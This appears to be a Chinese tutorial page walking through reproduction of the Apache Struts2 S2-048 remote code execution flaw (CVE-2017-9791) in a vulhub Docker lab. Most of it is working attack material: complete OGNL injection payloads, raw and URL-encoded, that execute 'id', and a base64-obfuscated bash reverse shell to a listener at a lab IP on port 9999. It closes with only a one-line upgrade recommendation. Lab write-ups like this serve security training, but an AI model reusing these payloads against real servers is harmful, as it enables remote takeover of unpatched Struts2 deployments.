提供了编程的基础技术教程

zl程序教程

您现在的位置是:首页 >  其他

当前栏目

CVE-2017-9791 S2-048 远程代码执行漏洞

漏洞 远程 2017 CVE 代码执行 S2
2023-06-13 09:16:09 时间

1 漏洞信息

漏洞名称

远程代码执行漏洞

漏洞编号

CVE-2017-9791

危害等级

高危

漏洞类型

中间件漏洞

漏洞厂商

Apache

漏洞组件

Struts2

受影响版本

2.0.0 <= Struts2 <= 2.3.32

漏洞概述

攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。

2 环境搭建

2.1 环境概述

  • Linux操作系统

2.2 搭建过程

拉取镜像

 cd vulhub/struts2/s2-048
 docker-compose up -d

访问http://192.168.146.158:8048/integration/editGangster.action

3 漏洞复现

访问url,然后在Name写入${333*3},Age和Description随便写。

发现成功执行了333*3的乘法,说明存在该漏洞。

既然发现漏洞了,那我们可以构造一个payload,执行id命令。

 name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29.%28%23q%29%7D&age=2&__checkbox_bustedBefore=true&description=3
 ​
 payload原型:
 name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}&age=2&__checkbox_bustedBefore=true&description=3

成功执行了id命令。

接下来开始反弹shell

 bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
 进行base加密
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 然后进行url编码
 bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

访问漏洞url并且添加恶意payload进行抓包。

 name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%29%29.%28%23q%29%7D&age=2&__checkbox_bustedBefore=true&description=3
 ​
 payload原型:
 name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream())).(#q)}&age=2&__checkbox_bustedBefore=true&description=3

攻击机进行监听,然后发现成功反弹了shell。

4 修复建议

1、推荐的解决方案:升级至比受漏洞影响的更高版本。

相关文章